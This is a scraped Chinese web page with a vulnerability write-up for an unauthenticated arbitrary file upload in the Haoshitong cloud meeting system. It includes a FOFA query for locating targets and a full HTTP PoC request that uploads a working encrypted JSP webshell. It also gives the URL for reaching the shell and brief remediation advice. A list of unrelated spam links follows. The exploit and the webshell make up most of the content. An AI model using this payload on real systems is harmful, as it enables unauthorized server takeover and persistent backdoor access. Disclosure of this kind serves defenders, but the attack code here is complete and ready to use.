当前位置: 首页 > news >正文

五百亿网站建设想开个网站做外贸怎么做

五百亿网站建设,想开个网站做外贸怎么做,深圳市建筑工务署,wordpress 4.9.1 教程0x01 产品简介 好视通云会议是基于 Internet 的网络视频会议产品#xff0c;用户使用好视通云会议可以实现多人音视频交流、文字聊天、共享文档、共享屏幕等#xff0c;会议的管理者可以控制其他参会人的各种权限#xff0c;可以将会议录制成视频#xff0c;对会场进行点名…0x01 产品简介 好视通云会议是基于 Internet 的网络视频会议产品用户使用好视通云会议可以实现多人音视频交流、文字聊天、共享文档、共享屏幕等会议的管理者可以控制其他参会人的各种权限可以将会议录制成视频对会场进行点名等。 0x02 漏洞概述 好视通云会议/fm/systemConfig/upLoad2.jsp接口处存在任意文件上传漏洞未经身份认证的攻击者可以通过此漏洞上传恶意后门文件最终可获取服务器权限。 0x03 复现环境 FOFAapp好视通-云会议 0x04 漏洞复现  PoC POST /fm/systemConfig/upLoad2.jsp HTTP/1.1 Host: your-ip Content-Type: multipart/form-data; boundary1515df1sdfdsfddfs Accept-Encoding: gzip User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15--1515df1sdfdsfddfs Content-Disposition: form-data; namefile; filename1.jsp Content-Type: application/octet-stream%! String xc3c6e0b8a9c15224a; String passpass; String md5md5(passxc); class X extends ClassLoader{public X(ClassLoader z){super(z);}public Class Q(byte[] cb){return super.defineClass(cb, 0, cb.length);} }public byte[] x(byte[] s,boolean m){ try{javax.crypto.Cipher cjavax.crypto.Cipher.getInstance(AES);c.init(m?1:2,new javax.crypto.spec.SecretKeySpec(xc.getBytes(),AES));return c.doFinal(s); }catch (Exception e){return null; }} public static String md5(String s) {String ret null;try {java.security.MessageDigest m;m java.security.MessageDigest.getInstance(MD5);m.update(s.getBytes(), 0, s.length());ret new java.math.BigInteger(1, m.digest()).toString(16).toUpperCase();} catch (Exception e) {}return ret; } public static String base64Encode(byte[] bs) throws Exception {Class base64;String value null;try {base64Class.forName(java.util.Base64);Object Encoder base64.getMethod(getEncoder, null).invoke(base64, null);value (String)Encoder.getClass().getMethod(encodeToString, new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e) {try { base64Class.forName(sun.misc.BASE64Encoder); Object Encoder base64.newInstance(); value (String)Encoder.getClass().getMethod(encode, new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e2) {}}return value; } public static byte[] base64Decode(String bs) throws Exception {Class base64;byte[] value null;try {base64Class.forName(java.util.Base64);Object decoder base64.getMethod(getDecoder, null).invoke(base64, null);value (byte[])decoder.getClass().getMethod(decode, new Class[] { String.class }).invoke(decoder, new Object[] { bs });} catch (Exception e) {try { base64Class.forName(sun.misc.BASE64Decoder); Object decoder base64.newInstance(); value (byte[])decoder.getClass().getMethod(decodeBuffer, new Class[] { String.class }).invoke(decoder, new Object[] { bs });} catch (Exception e2) {}}return value; }%%try{byte[] database64Decode(request.getParameter(pass));datax(data, false);if (session.getAttribute(payload)null){session.setAttribute(payload,new X(this.getClass().getClassLoader()).Q(data));}else{request.setAttribute(parameters,data);java.io.ByteArrayOutputStream arrOutnew java.io.ByteArrayOutputStream();Object f((Class)session.getAttribute(payload)).newInstance();f.equals(arrOut);f.equals(pageContext);response.getWriter().write(md5.substring(0,16));f.toString();response.getWriter().write(base64Encode(x(arrOut.toByteArray(), true)));response.getWriter().write(md5.substring(16));} }catch (Exception e){} out.print(ojbk); % --1515df1sdfdsfddfs-- 验证url GET /fm/upload/上传的文件名 HTTP/1.1 Host: your-ip User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 Accept-Encoding: gzip 尝试连接 0x05 修复建议 官方已修复该漏洞请用户联系厂商修复漏洞http://www.hst.com/ 通过防火墙等安全设备设置访问策略设置白名单访问。 如非必要禁止公网访问该系统。
http://www.zqtcl.cn/news/946636/

相关文章:

  • 大连哪里有手机自适应网站建设网站开发层次
  • 网站首页的浮窗怎么做美食网站程序
  • 淮北网站建设建设银行福州分行招聘网站
  • c 网站开发 pdf济南集团网站建设报价
  • 做网站找哪家公司好中国网络优化推广
  • 创建网站目录结构应遵循的方法dz旅游网站模板
  • 我看别人做系统就直接网站下载软件外贸物流流程
  • 手机微信网站南县网站定制
  • 做字幕网站重庆seo代理价格
  • 长春公司做网站找哪个公司好英文网站google推广
  • 潍坊网站建设方案推广官方网站如何建设
  • 设计网站的公司名称苏州建设人才网官网
  • 河南网站推广优化公司wordpress搭建vip下载站
  • 做网站拉客户有效吗网络宣传渠道
  • 制作深圳网站建设四川广安网站建设
  • 网站服务器服务商wordpress特效主题
  • 大型大型网站制作wordpress产品相册
  • 古董做推广哪个网站好租空间开网站
  • 巴中网站建设开发公司网站上传在空间哪里
  • 哈尔滨网站建设赚钱么宁波大型网站制作
  • 自助网站搭建群晖搭建的wordpress外网访问
  • 社区网站建设申请报告WordPress评论通知邮箱
  • 佛山网站建设技术托管建设网站容易吗
  • 网站开发的层级结构iis6.0如何做网站301
  • 做旅游那些网站好个人博客怎么做
  • 中国最好网站建设公司网站前台做好之后再怎么做
  • 焦作整站优化app开发报价单及方案
  • 网站开发合同验收怎样建立网站 优帮云
  • 池州哪家做网站wordpress方小程序主题
  • 免费建设网站入驻七牛云存储wordpress